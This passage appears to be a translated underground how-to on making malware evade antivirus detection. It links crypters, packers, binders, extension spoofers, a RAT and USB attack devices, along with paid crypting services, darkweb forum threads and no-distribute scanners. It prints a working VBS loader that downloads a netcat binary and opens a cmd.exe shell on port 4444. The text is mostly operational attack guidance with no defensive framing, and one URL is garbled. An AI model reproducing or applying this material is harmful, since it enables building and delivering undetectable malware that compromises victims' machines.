6) Remove fingerprints (name of shpz, author name)
https://github.com/quasar/QuasarRAT

> 1.exe head 1000 1.exe> /host/machine/ with such a load, you can see which bit of code the antivirus complains about.

Hex editor
https://mh-nexus.de/en/hxd/
https://www.x-ways.net/winhex/
https://www.wxhexeditor.org/

Debuggers
https://www.immunityinc.com/products/canvas/debugger
https://samsclass.info/127/proj/p8aim.htm article
https://exelab.ru/download.php?action=list&n=MTA=

Signature certificate
http://qaru.site/questions/54786/signing-a-windows-exe-file guide - Windows in the standard way
https://www.connect-trojan.net/2016/06/aegis-crypter-8.5.html Aegis crypter has this function
Installers and sfx:
https://www.advancedinstaller.com/
https://www.actualinstaller.com/
http://www.cyberforum.ru/cmd-bat/thread2022256.html sfx archive

Packers
UPX, ASPack, FSG, PeShield, VMProtect
https://github.com/EgeBalci/Amber
https://github.com/Eronana/packer
http://www.webtoolmaster.com/packer.htm
https://www.boxedapp.com/
https://github.com/SerGreen/Appacker very interesting packer, it can pack an entire folder

Protectors and anti-debugging
https://github.com/bekdepo/cryptor you need to compile it
https://github.com/Paskowsky/DreamProtectorFree GUI
https://exelab.ru/download.php?action=list&n=NDA= a collection of protectors that are still relevant

Cryptors
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries
https://github.com/Ch0pin/AVIator
https://github.com/NYAN-x-CAT/Lime-Crypter
https://github.com/extremecoders-re/xor-files xor
https://github.com/malwares/Crypter to compile; a huge list
https://github.com/guilhermej/scantime_py_crypter easy to understand, you can change the key

Stub generators
https://www.youtube.com/watch?v=_Qx3UZAuo8o
https://www.mediafire.com/file/pazaz4pzwk27eow/%5BVIP%5DCrypter+v2f%2BUnique+Stub+Generator+0.5.1+%5BFUD%5D%5BApril+2014%5D.rar

Loader / Dropper

A loader is a bootloader which by itself does not affect the system in any way; it stays in the system for the specified time and, after it has finished downloading the payload, is usually no longer used. Examples of loaders are vbs, js, hta, bat, ps1 and other files. Also, Windows has built-in software such as FTP and START (bat), and ps scripts or certutil can also download malware.

• Article on this subject: https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/

• Example of a loader in vbs

dim http_obj
dim stream_obj
dim shell_obj
set http_obj = CreateObject("Microsoft.XMLHTTP")
set stream_obj = CreateObject("ADODB.Stream")
set shell_obj = CreateObject("WScript.Shell")
URL = "http://www.mikemurr.com/example.exe" 'Where to download the file from
FILENAME = "nc.exe" 'Name to save the file (on the local system)
RUNCMD = "nc.exe -L -p 4444 -e cmd.exe" 'Command to run after downloading
http_obj.open "GET", URL, False
http_obj.send
stream_obj.type = 1
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2
shell_obj.run RUNCMD

https://github.com/d4rkcat/cryptbinder
https://github.com/93aef0ce4dd141ece6f5/File-Binder simple and generates a stub
https://github.com/NAWAK01/WinRAT classic dropper on command

Spoofers and diapers:
https://github.com/henriksb/ExtensionSpoofer
https://github.com/AHXR/maskedkitty
https://mega.nz/#!NxZACbJA!me-l4SBMoMkAGqbg1rwIVBLINeNvudC21NEBuskrsxU
https//www.forw.forw.forw.for showthread.php? t = 996627
Glue / Joiner
Joiner by Blade, SuperGlue, MicroJoiner, Juntador
https://github.com/danielhnmoreno/pyJoiner
https://www.exejoiner.com/

Delivery

Online. Formats: Doc, Docx, Rtf. Options: social engineering, exploits in versions of
Obfuscation is often used when delivering documents.

Offline. Options: social engineering, equipment capture, access.

Rubber Ducky
https://github.com/SkiddieTech/UAC-DE-Rubber-Ducky
https://github.com/hak5darren/USB-Rubber-Ducky

Digispark
https://github.com/CedArctic/DigiSpark-Scripts

Ninja cable
https://usbninja.com/

In offline delivery, you can and should use spoofers.

What should be in a cryptor to be secure: Anti Ring3 Hooks, Anti Emulator, Anti Debugger, Anti Dumper, Anti VM / SandBox. It can also give antivirus false positives - you should also understand this.

• Paid services
https://theoldphantom.net/
https://spartanproducts.net/
http://staticsoftwares.pro/

• People
https://bhf.io/threads/534014/
https://lolzteam.org/threads/964713/
https://darkwebs.cc/threads/95571/
https://darkwebs.cc/threads/74946/
https://lolzteam.org/threads/314158/

• Free services
http://virtualcrypt.xyz/
https://www.crypter.com/download.html

• Crypter forums
http://shanghaiblackgoons.com/crypters/
http://www.blackhatrussia.com/crypters/
https://zhacker.net/crypter/
https://ifud.ws/forums/kriptory-jojnery.2/

• Where can I check FUD
https://nodistribute.com
https://antiscan.me/
https://run4me.net/

Additionally
Information on what things affect detections, from md5 to behavior and icons:
https://github.com/vulnz/false-positive-executed
https://ifud.ws/threads/exel-b-kurs-videourokov-krehkerstvo-programmirovanie-2017-pcrec.13022/ Exelab courses + software